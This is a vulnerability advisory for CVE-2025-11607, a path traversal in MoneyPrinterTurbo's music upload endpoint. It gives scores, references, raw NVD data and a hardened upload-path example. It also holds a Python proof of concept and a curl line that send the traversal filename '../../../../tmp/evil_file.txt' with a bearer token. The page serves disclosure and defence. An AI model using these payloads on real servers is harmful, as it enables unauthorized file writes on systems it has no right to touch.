Security Vulnerability Report
CVE-2025-11607 CVSS 6.3 MEDIUM

Published: 2025-10-11 17:15:38
Last Modified: 2026-04-29 01:00:02

Description

A path traversal weakness (CWE-22) has been identified in harry0703 MoneyPrinterTurbo up to and including version 1.2.6. The affected code is the function upload_music in the file app/controllers/v1/music.py, part of the API Endpoint component. Manipulating the File argument (the filename of the uploaded file, as in the PoC on this page) lets a remote caller who holds low-privilege credentials place the uploaded content outside the intended upload directory; the referenced advisory describes the issue as an arbitrary file write. A public exploit exists and could be used for attacks.

CVSS Details

CVSS Score
6.3 (CVSS 3.1, secondary assessment from the reporting CNA)
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

The scores recorded for this CVE disagree, and the headline figure above is the lowest of the CVSS 3.1 ratings. The primary CVSS 3.1 assessment (NVD's) rates the same issue 8.8 HIGH with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H, i.e. High impact on confidentiality, integrity and availability. The secondary CVSS 4.0 vector scores it 2.1 LOW with exploit maturity PROOF_OF_CONCEPT, and the secondary CVSS 2.0 vector (AV:N/AC:L/Au:S/C:P/I:P/A:P) scores it 6.5 MEDIUM. All vectors agree on the preconditions: reachable over the network, low attack complexity, a low-privilege account required, no user interaction. When triaging an exposed instance, work from the 8.8 HIGH figure: an authenticated arbitrary file write on the API host is the impact the referenced advisory describes.
Weakness: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)

Configurations (Affected Products)

cpe:2.3:a:harry0703:moneyprinterturbo:*:*:*:*:*:*:*:* - VULNERABLE
MoneyPrinterTurbo <= 1.2.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-11607 - MoneyPrinterTurbo Path Traversal PoC
# Vulnerability: Path Traversal in upload_music function (app/controllers/v1/music.py)
# Affected: MoneyPrinterTurbo <= 1.2.6
#
# Caveats: the endpoint path, port and multipart field name below are the PoC's
# assumptions and should be checked against the target's routes before use. An
# HTTP 200 only shows the upload was accepted; confirm the write landed outside
# the upload directory (e.g. the file exists at the traversed path on the host).
import requests

# Target configuration
TARGET_URL = "http://target:8080"
AUTH_TOKEN = "your_low_privilege_token_here"

# Step 1: Authenticate and obtain session (if needed)
session = requests.Session()

# Step 2: Prepare the malicious file upload with path traversal payload
# The File parameter (the multipart filename) is manipulated to traverse directories
malicious_filename = "../../../../tmp/evil_file.txt"

# Craft the multipart form data with traversal filename; requests sends the
# filename as-is in the Content-Disposition header
files = {
    "file": (malicious_filename, b"malicious content payload", "audio/mpeg")
}

# Step 3: Send the request to the vulnerable upload_music endpoint
headers = {
    "Authorization": f"Bearer {AUTH_TOKEN}",
}
upload_url = f"{TARGET_URL}/api/v1/music/upload"
response = session.post(upload_url, files=files, headers=headers)

# Step 4: Check the response
if response.status_code == 200:
    print(f"[+] Upload accepted; file likely written to: {malicious_filename}")
    print(f"[+] Response: {response.text}")
else:
    print(f"[-] Upload failed with status code: {response.status_code}")
    print(f"[-] Response: {response.text}")

# Alternative: Using curl command
# curl -X POST "http://target:8080/api/v1/music/upload" \
#   -H "Authorization: Bearer YOUR_TOKEN" \
#   -F "file=@local_file.mp3;filename=../../../../tmp/evil_file.txt"
```
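The bug class behind the PoC above is a server-side upload handler that joins the client-supplied multipart filename onto its storage directory. The following is an added illustration of that pattern beside a hardened version; it is not MoneyPrinterTurbo's code, and the directory name, the extension allowlist and the helper names (`unsafe_upload_path`, `safe_upload_path`, `is_rejected`) are assumptions made for the example.

```python
# Added example, not MoneyPrinterTurbo's code: the CWE-22 pattern behind
# CVE-2025-11607 shown as a vulnerable join beside a hardened path builder.
# Directory name, allowed extensions and helper names are assumptions.
import os
from pathlib import Path, PurePosixPath

ALLOWED_EXTS = (".mp3", ".wav", ".flac")  # assumed allowlist for a music upload


class UnsafeFilename(ValueError):
    """Raised when a client-supplied filename is not acceptable."""


def unsafe_upload_path(upload_dir: str, filename: str) -> str:
    """Vulnerable pattern: the multipart Content-Disposition filename (what a
    FastAPI UploadFile exposes as .filename) is trusted as a path component.
    normpath only shows where the kernel would actually write; the bug is the join."""
    return os.path.normpath(os.path.join(upload_dir, filename))


def safe_upload_path(upload_dir: str, filename: str,
                     allowed_exts=ALLOWED_EXTS) -> Path:
    """Hardened pattern: reduce the name to one sanitized component, then
    confirm the resolved target still sits directly inside upload_dir."""
    if "\x00" in filename:
        raise UnsafeFilename(f"NUL byte in {filename!r}")
    # Treat backslashes as separators too, so "..\\..\\x" is not one component
    # on a POSIX host where os.path would not split it.
    base = PurePosixPath(filename.replace("\\", "/")).name
    if base in ("", ".", "..") or base.startswith("."):
        raise UnsafeFilename(f"empty, dot-only or hidden name: {filename!r}")
    if not all(c.isalnum() or c in "._-" for c in base):
        raise UnsafeFilename(f"disallowed characters in {filename!r}")
    if Path(base).suffix.lower() not in allowed_exts:
        raise UnsafeFilename(f"extension not allowed: {filename!r}")
    root = Path(upload_dir).resolve()
    target = (root / base).resolve()
    # Defence in depth: even after sanitization, insist the resolved target's
    # parent is exactly the upload root (a symlink planted inside the directory
    # could otherwise redirect the write elsewhere).
    if target.parent != root:
        raise UnsafeFilename(f"resolved outside upload dir: {target}")
    return target


def is_rejected(upload_dir: str, filename: str) -> bool:
    """True if the hardened path builder refuses this filename."""
    try:
        safe_upload_path(upload_dir, filename)
    except UnsafeFilename:
        return True
    return False


if __name__ == "__main__":
    root = "/srv/app/storage/music"  # assumed upload directory
    samples = ["song.mp3", "../../../../tmp/evil_file.txt",
               "..\\..\\evil.mp3", "x/y.mp3", "evil\x00.mp3"]
    for name in samples:
        vulnerable = unsafe_upload_path(root, name)
        hardened = "REJECTED" if is_rejected(root, name) else safe_upload_path(root, name)
        print(f"{name!r:32} unsafe -> {vulnerable}")
        print(f"{'':32} safe   -> {hardened}")
```

The traversal payload from the PoC lands at /tmp/evil_file.txt through the vulnerable join, while the hardened builder either rejects it or keeps only the final component and stores it under the upload root. The containment check after `resolve()` is deliberately kept even though the sanitized name cannot contain separators: it is the cheap second line of defence if the sanitization is later loosened.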

References

https://vuldb.com/?ctiid.327929 (VulDB entry; permissions required)
https://vuldb.com/?id.327929 (VulDB third-party advisory)
https://vuldb.com/?submit.672550 (VulDB submission)
https://www.notion.so/Arbitrary-File-Write-Vulnerability-in-MoneyPrinterTurbo-1-2-6-288014c4d9ca809bb411e4fe875d1e22 (advisory write-up "Arbitrary File Write Vulnerability in MoneyPrinterTurbo 1.2.6"; permissions required)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11607", "sourceIdentifier": "[email protected]", "published": "2025-10-11T17:15:37.513", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in harry0703 MoneyPrinterTurbo up to 1.2.6. The impacted element is the function upload_music of the file app/controllers/v1/music.py of the component API Endpoint. Executing a manipulation of the argument File can lead to path traversal. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", 
"Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:harry0703:moneyprinterturbo:*:*:*:*:*:*:*:*", 
"versionEndIncluding": "1.2.6", "matchCriteriaId": "996FCD58-2276-45A5-A7DA-B7E3BB897B4E"}]}]}], "references": [{"url": "https://vuldb.com/?ctiid.327929", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327929", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.672550", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.notion.so/Arbitrary-File-Write-Vulnerability-in-MoneyPrinterTurbo-1-2-6-288014c4d9ca809bb411e4fe875d1e22", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.notion.so/Arbitrary-File-Write-Vulnerability-in-MoneyPrinterTurbo-1-2-6-288014c4d9ca809bb411e4fe875d1e22", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Permissions Required"]}]}}